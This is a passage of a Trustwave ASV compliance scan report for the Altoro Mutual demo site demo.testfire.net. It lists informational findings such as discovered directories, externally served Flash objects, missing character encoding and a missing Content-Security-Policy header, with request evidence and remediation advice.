
Port: tcp/80

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 731 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:80/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

414 Website Detected 0.0 Info Pass URL: http://65.61.137.117/


Port: tcp/80

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

415 Embedded links or code 0.0 Info Pass URL: http://demo.testfire.net/index.jsp?content=inside_contact.htm


from out-of-scope domains Port: tcp/80

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 732 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://demo.testfire.net/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

416 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/survey_questions.jsp


Port: tcp/8080

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 733 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

417 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

418 Embedded links or code 0.0 Info Pass URL: https://demo.testfire.net:8443/index.jsp?content=inside_conta


from out-of-scope domains ct.htm
Port: tcp/8443

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
DetectionDetails: Following External Links Found:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 734 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

419 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/survey_questions.jsp


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 735 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

420 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117

421 Website Detected 0.0 Info Pass URL: https://demo.testfire.net/


Port: tcp/443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

422 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/disclaimer.htm?url=http://www.mi


crosoft.com
Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

423 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/index.jsp?content=inside.htm


Port: tcp/8443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 736 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

424 Discovered Web Directories 0.0 Info Pass URL: http://demo.testfire.net:80/admin/


Port: tcp/80

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:80/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

425 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/survey_questions.jsp


Port: tcp/80

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 737 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

426 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/index.jsp?content=inside.htm


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

427 Embedded links or code 0.0 Info Pass URL: http://demo.testfire.net:8080/index.jsp?content=inside_contac


from out-of-scope domains t.htm
Port: tcp/8080

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 738 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
125" height="50" id="subscribe" align="middle"> <param
name="allowScriptAccess" value="sameDomain"> <param
name="movie" value="subscribe.swf"> <param name="quality"
value="high"> <param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://demo.testfire.net:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

428 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/sendFeedback


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

429 Embedded links or code 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp?content=inside_contact.h


from out-of-scope domains tm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 739 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Port: tcp/8080

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 740 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

430 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/swagger/index.html


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

431 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/feedback.jsp


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

432 Enumerated Applications 0.0 Info Pass URL: http://demo.testfire.net/


Port: tcp/80

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 741 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

433 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117/high_yield_investments.htm


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 742 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

434 HTTP Responses Missing 0.0 Info Pass URL: http://65.61.137.117/retirement.htm


Character Encoding Port: tcp/80

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 743 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://65.61.137.117/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

435 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net:8080/retirement.htm


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 744 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net:8080/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

436 Enumerated Applications 0.0 Info Pass URL: http://65.61.137.117/


Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 745 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

437 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/index.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

438 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/feedback.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 746 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

439 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/disclaimer.htm?url=http://www.microsof


t.com
Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

440 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp?content=inside_contact.h


tm
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

441 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/survey_questions.jsp?step=a


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 747 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

442 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/search.jsp?query=_WSETESTDAT


A
Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

443 Insecure or no Content- 0.0 Info Pass URL: https://65.61.137.117:8443/


Security-Policy header Port: tcp/8443

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 748 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4;
Path=/; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:36:25 GMT
Content-Length: 9369

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 749 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 750 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<table cellspacing="0" width="100%">
<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 751 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2"
href="index.jsp?content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3"
href="index.jsp?content=personal_loans.htm">Loan
Products</a></li>
<li><a id="MenuHyperLink4"
href="index.jsp?content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 752 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 753 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br />
<center><img src="images/home1.jpg" width="170"
height="114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
